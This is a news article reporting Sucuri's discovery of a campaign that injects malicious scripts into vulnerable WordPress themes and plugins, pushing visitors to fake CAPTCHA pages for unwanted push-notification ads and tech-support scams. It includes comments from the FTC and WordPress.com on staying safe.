If you’ve recently visited a website and found yourself being returned to the same pages with questionable “resources” or annoying adverts, it’s probable that the site was 1) constructed with WordPress tools and 2) hacked.
On Wednesday, researchers at Sucuri, a GoDaddy-owned security firm, discovered that the hackers behind a months-long campaign aimed at inserting malicious scripts into WordPress themes and plugins with known security flaws were at it again.
These vulnerabilities affect themes and plugins created by hundreds of third-party developers utilising the open source WordPress software, not WordPress.com, which provides hosting and website-building tools. WordPress.com’s parent business, Automattic, is a significant contributor to the software but does not control it.
According to Sucuri, the new vulnerability has infected 322 WordPress sites using plugins and themes, while the “real number of vulnerable websites is likely significantly greater.”
According to Sucuri malware expert Krasimir Konov, hackers employed this approach to infect roughly 6,000 sites in April alone.
Konov wrote, “This page tricks unsuspecting users into subscribing to push notifications from the malicious site. If they click on the fake CAPTCHA, they’ll be opted in to receive unwanted ads even when the site isn’t open — and ads will look like they come from the operating system, not from a browser.”
If that wasn’t terrible enough, Konov claims that one of the most prevalent ways for hackers to execute tech support scams is through opt-in manuevers for push notifications. These are the unpleasant windows that appear out of nowhere and inform you that your computer is infected and that you need contact a phone number to have it fixed. This should not be done.
The Federal Trade Commission, which is an expert in spotting scams, advises that genuine security notifications and cautions will not require you to call a phone number for technical assistance.
A spokesperson for WordPress.com said, “If security issues are identified, plugin and theme authors are notified immediately. Specific to Sucuri’s report, any plugin that wasn’t patched was either closed or not hosted on WordPress.org. WordPress.org also provides resources on security to both theme developers and plugin developers.”
Added, “For self-hosted sites, WordPress users are notified and encouraged to update core software, plugins and themes by default.”
[embedpost slug= “/google-claims-that-new-eyeglasses-can-instantly-translate-languages/”]
